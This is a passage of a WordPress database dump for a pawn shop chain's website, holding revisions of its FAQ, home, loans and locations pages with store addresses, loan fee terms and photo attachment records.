guarantee that their merchandise has been screened in this way? Why buy second-hand? Our stores offer a great opportunity to purchase items at a reduced price. We offer a 30-day functional warranty on non-jewelry items. Our jewelry is guaranteed & comes with a lifetime stone replacement warranty. See our Sales Policies here.\r\n<h3>How do I know it\'s not stolen?</h3>\r\nQuoted: \"Nationally less than one (1%) percent of all loans are stolen, of those a good 80% are family related. Over 78,000 people are employed in the industry, which contributes 1.6 billion dollars in salaries to the nation\'s economy. Approximately 303 million dollars in sales & property taxes are contributed by the industry. Capital investments of over 9 billion dollars are from the Pawn industry. There are over 34 million customers served yearly by pawnshops.\"\r\n\r\nIn conclusion, there is a great deal of misunderstanding concerning the pawn business. It is a business that combines retail sales with old fashioned banking & serves a clientele that includes all income brackets. Those involved work diligently toward keeping their business legal as well as serving a needed purpose in the community of loaning to those whom the banks will never acknowledge.\r\n[/one_half]\r\n[/row_fluid]','FAQ\'s','','publish','closed','open','','guidelines-policies','','','2015-03-09 14:52:13','2015-03-09 21:52:13','',31,'http://atgjewelry.com/fuze7/?page_id=120',0,'page','',0),(71,1,'2015-02-12 18:37:51','2015-02-12 18:37:51','','40_2210_8804S_98_C630_3-1024x512','','inherit','open','open','','40_2210_8804s_98_c630_3-1024x512','','','2015-02-12 18:37:51','2015-02-12 18:37:51','',70,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/40_2210_8804S_98_C630_3-1024x512.jpg',0,'attachment','image/jpeg',0),(72,1,'2015-02-12 18:39:55','2015-02-12 18:39:55','','Alpina Extreme','','trash','closed','closed','','alpina-extreme','','','2015-03-09 19:28:22','2015-03-10 02:28:22','',0,'http://atgjewelry.com/fuze7/?post_type=slider&p=72',0,'slider','',0),(73,1,'2015-02-12 18:39:37','2015-02-12 18:39:37','','Alpina-Extreme-Diver-1024x682','','inherit','open','open','','alpina-extreme-diver-1024x682','','','2015-02-12 18:39:37','2015-02-12 18:39:37','',72,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Alpina-Extreme-Diver-1024x682.jpg',0,'attachment','image/jpeg',0),(74,1,'2015-03-10 18:35:26','2015-03-11 01:35:26','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com\" alt=\"Guitars\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/ring.jpg\" alt=\"Rings\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/gun.jpg\" alt=\"Guns\" /></a></div>\n[banner img=\"/fuze7/wp-content/uploads/2015/03/guitar.jpg\" banner_link=\"#\" title=\"Guitars\" text=\"We\" btn_text=\" \" target=\"_self\"]\n[clear]\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\n[row_fluid]\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\n[one_third]\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\n[/one_third]\n[/row_fluid]\n<h2><strong>Oregon Locations</strong></h2>\n<h4>[row]\n[span1][/span1]\n<strong>[span2]Portland</strong>\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\n503-761-9699[/span2]\n<strong>[span2]N. Portland</strong>\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\n503-247-1019[/span2]\n<strong>[span2]Tigard</strong>\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\n503-968-9510[/span2]\n<strong>[span2]Milwaukie</strong>\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\n503-785-1168[/span2]\n<strong>[span2]Salem</strong>\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\n503-362-9939[/span2]\n[span1][/span1]\n[/row]</h4>\n \n\n ','Home','','inherit','open','open','','48-autosave-v1','','','2015-03-10 18:35:26','2015-03-11 01:35:26','',48,'http://atgjewelry.com/fuze7/48-autosave-v1/',0,'revision','',0),(75,1,'2015-02-12 10:58:21','2015-02-12 18:58:21','<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\nAll of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.\r\n\r\nAt All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.\r\n\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n\r\n[row]\r\n[span1][/span1]\r\n[span2]Portland\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n[span2]Portland\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n[span2]Milwaukie\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n[span2]Tigard\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n[span2]Salem\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]\r\n','Home','','inherit','open','open','','48-revision-v1','','','2015-02-12 10:58:21','2015-02-12 18:58:21','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(76,1,'2015-02-12 11:00:02','2015-02-12 19:00:02','<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\n[one_half]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.\r\n\r\nAt All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_half]\r\n[one_half]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_half]\r\n[row]\r\n[span1][/span1]\r\n[span2]Portland\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n[span2]Portland\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n[span2]Milwaukie\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n[span2]Tigard\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n[span2]Salem\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]\r\n','Home','','inherit','open','open','','48-revision-v1','','','2015-02-12 11:00:02','2015-02-12 19:00:02','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(77,1,'2015-02-12 11:01:01','2015-02-12 19:01:01','<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\n[row_fluid]\r\n[one_half]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.\r\n\r\nAt All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_half]\r\n[one_half]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_half]\r\n[/row_fluid]\r\n[row]\r\n[span1][/span1]\r\n[span2]Portland\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n[span2]Portland\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n[span2]Milwaukie\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n[span2]Tigard\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n[span2]Salem\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]\r\n','Home','','inherit','open','open','','48-revision-v1','','','2015-02-12 11:01:01','2015-02-12 19:01:01','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(78,1,'2015-02-12 11:01:58','2015-02-12 19:01:58','<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\n[row_fluid]\r\n[one_half]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.\r\n\r\nAt All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_half]\r\n[one_half]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_half]\r\n[/row_fluid]\r\n<h2>Locations</h2>\r\n[row]\r\n[span1][/span1]\r\n[span2]<strong>Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n[span2]<strong>Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n[span2]<strong>Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n[span2]<strong>Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n[span2]<strong>Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]','Home','','inherit','open','open','','48-revision-v1','','','2015-02-12 11:01:58','2015-02-12 19:01:58','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(79,1,'2015-02-12 11:03:09','2015-02-12 19:03:09','<h2>All That Glitters, Reinventing The Pawn Shop</h2>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2>Locations</h2>\r\n[row]\r\n[span1][/span1]\r\n[span2]<strong>Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n[span2]<strong>Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n[span2]<strong>Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n[span2]<strong>Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n[span2]<strong>Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]','Home','','inherit','open','open','','48-revision-v1','','','2015-02-12 11:03:09','2015-02-12 19:03:09','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(80,1,'2015-02-12 11:10:09','2015-02-12 19:10:09','<h2>Quick and Easy...Cash Loans Today!</h2>\n[row_fluid]\n[one_half]\n<ul class=\"listing-check\">\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\n <li>Our trained staff will evaluate the item(s) and discuss it\'s loan value with you.</li>\n <li>We will explain the terms, and go over any questions you might have about the procedure.</li>\n <li>Sign the documents and leave with cash..its just that easy!</li>\n</ul>\n \n\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" />\n\n<strong>Loan Terms:</strong>\n\nLoans are held for 60 days, and may be extended longer by paying a finance charge. Finance charge is made up of the following: (all fees based on the amount you borrow)\n\n<ul class=\"listing-check\">\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\n <li>Set up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\n <li>Gun Fee: $3.00 on new loans, also any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\n</ul>\n\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\n\n \n\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold filled jewelry.</strong>\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\n<div class=\"loans\">\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\n<div class=\"loans-guitar\"><strong>Guitars</strong>\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\n<div class=\"loans-firearms\"><strong>Firearms</strong>\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\n</div>','Loans','','inherit','open','open','','34-autosave-v1','','','2015-02-12 11:10:09','2015-02-12 19:10:09','',34,'http://atgjewelry.com/fuze7/34-autosave-v1/',0,'revision','',0),(81,1,'2015-02-12 11:11:12','2015-02-12 19:11:12','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss it\'s loan value with you.</li>\r\n <li>We will explain the terms, and go over any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..its just that easy!</li>\r\n</ul>\r\n \r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img.png\" alt=\"\" width=\"277\" height=\"188\" />\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended longer by paying a finance charge. Finance charge is made up of the following: (all fees based on the amount you borrow)\r\n\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, also any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n\r\n<img src=\"http://atgjewelry.com/images/lone-img1.png\" alt=\"\" width=\"184\" height=\"102\" />\r\n\r\n[/one_half]\r\n[one_half]\r\nWe loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in we\'ll take a look at it and try to give you the most cash we can! <strong>Sorry, we cannot accept plated or gold filled jewelry.</strong>\r\n<img src=\"http://atgjewelry.com/images/lone-img2.png\" alt=\"\" width=\"279\" height=\"187\" />\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of electronics - Video games </strong>\r\n<img src=\"http://atgjewelry.com/images/video-games.png\" alt=\"\" width=\"280\" height=\"186\" /></div>\r\n<div class=\"loans-guitar\"><strong>Guitars</strong>\r\n<img src=\"http://atgjewelry.com/images/guitars.png\" alt=\"\" width=\"202\" height=\"186\" /></div>\r\n<div class=\"loans-firearms\"><strong>Firearms</strong>\r\n<img src=\"http://atgjewelry.com/images/firearms.jpg\" alt=\"\" width=\"279\" height=\"186\" /></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-02-12 11:11:12','2015-02-12 19:11:12','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(85,2,'2015-02-15 14:24:55','2015-02-15 22:24:55','','Division_outside-2','','inherit','open','open','','division_outside-2','','','2015-02-15 14:24:55','2015-02-15 22:24:55','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg',0,'attachment','image/jpeg',0),(86,2,'2015-02-15 14:25:21','2015-02-15 22:25:21','','Lombard_inside-2','2932 N. Lombard','inherit','open','open','','lombard_inside-2','','','2015-02-15 14:53:01','2015-02-15 22:53:01','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg',0,'attachment','image/jpeg',0),(87,2,'2015-02-15 14:25:45','2015-02-15 22:25:45','','Lombard_outside-2','2932 N. Lombard','inherit','open','open','','lombard_outside-2','','','2015-02-15 14:57:33','2015-02-15 22:57:33','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg',0,'attachment','image/jpeg',0),(88,2,'2015-02-15 14:26:08','2015-02-15 22:26:08','','Milwaukie_inside','','inherit','open','open','','milwaukie_inside','','','2015-02-15 14:26:08','2015-02-15 22:26:08','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg',0,'attachment','image/jpeg',0),(89,2,'2015-02-15 14:26:39','2015-02-15 22:26:39','','Milwaukie_outside','','inherit','open','open','','milwaukie_outside','','','2015-02-15 14:26:39','2015-02-15 22:26:39','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg',0,'attachment','image/jpeg',0),(90,2,'2015-02-15 14:27:06','2015-02-15 22:27:06','','Salem_inside-2','','inherit','open','open','','salem_inside-2','','','2015-02-15 14:27:06','2015-02-15 22:27:06','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg',0,'attachment','image/jpeg',0),(91,2,'2015-02-15 14:27:24','2015-02-15 22:27:24','','Salem_Outside-2','','inherit','open','open','','salem_outside-2','','','2015-02-15 14:27:24','2015-02-15 22:27:24','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg',0,'attachment','image/jpeg',0),(92,2,'2015-02-15 14:27:46','2015-02-15 22:27:46','','Tigard_Inside_-2','','inherit','open','open','','tigard_inside_-2','','','2015-02-15 14:27:46','2015-02-15 22:27:46','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg',0,'attachment','image/jpeg',0),(93,2,'2015-02-15 14:28:09','2015-02-15 22:28:09','','Tigard_Site_Outside-2','','inherit','open','open','','tigard_site_outside-2','','','2015-02-15 14:28:09','2015-02-15 22:28:09','',83,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg',0,'attachment','image/jpeg',0),(94,2,'2015-02-15 14:56:21','2015-02-15 22:56:21','<strong> PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignleft\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n \r\n\r\n[caption id=\"attachment_84\" align=\"alignleft\" width=\"300\"]<img class=\"wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"Division_inside-2\" width=\"300\" height=\"192\" /> 12200 SE Division[/caption]\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_86\" align=\"alignleft\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"size-medium wp-image-86\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard <a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a> <a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"alignnone size-medium wp-image-90\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> <a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"alignnone size-medium wp-image-91\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> <a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"alignnone size-medium wp-image-92\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> <a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"alignnone size-medium wp-image-93\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a>[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 14:56:21','2015-02-15 22:56:21','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(95,2,'2015-02-15 14:58:07','2015-02-15 22:58:07','<strong> PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignleft\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n \r\n\r\n[caption id=\"attachment_84\" align=\"alignleft\" width=\"300\"]<img class=\"wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"Division_inside-2\" width=\"300\" height=\"192\" /> 12200 SE Division[/caption]\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"size-medium wp-image-87\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"size-medium wp-image-86\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard [/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 14:58:07','2015-02-15 22:58:07','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(96,2,'2015-02-15 15:02:49','2015-02-15 23:02:49','<strong> PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignleft\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n \r\n\r\n[caption id=\"attachment_84\" align=\"alignleft\" width=\"300\"]<img class=\"wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"Division_inside-2\" width=\"300\" height=\"192\" /> 12200 SE Division[/caption]\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"size-medium wp-image-87\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"size-medium wp-image-86\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-15 15:02:49','2015-02-15 23:02:49','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(97,2,'2015-02-15 15:05:48','2015-02-15 23:05:48','<strong> PORTLAND: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[caption id=\"attachment_84\" align=\"alignnone\" width=\"300\"]<strong><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" /></a></strong> 12200 SE Division[/caption]\r\n\r\nMILWAUKIE: 15114 SE McLoughlin\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n \r\n\r\n \r\n\r\n<strong> </strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong>PORTLAND: 2932 N. Lombard 503-247-1019</strong>\r\n\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"size-medium wp-image-87\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n\r\n[caption id=\"attachment_86\" align=\"alignnone\" 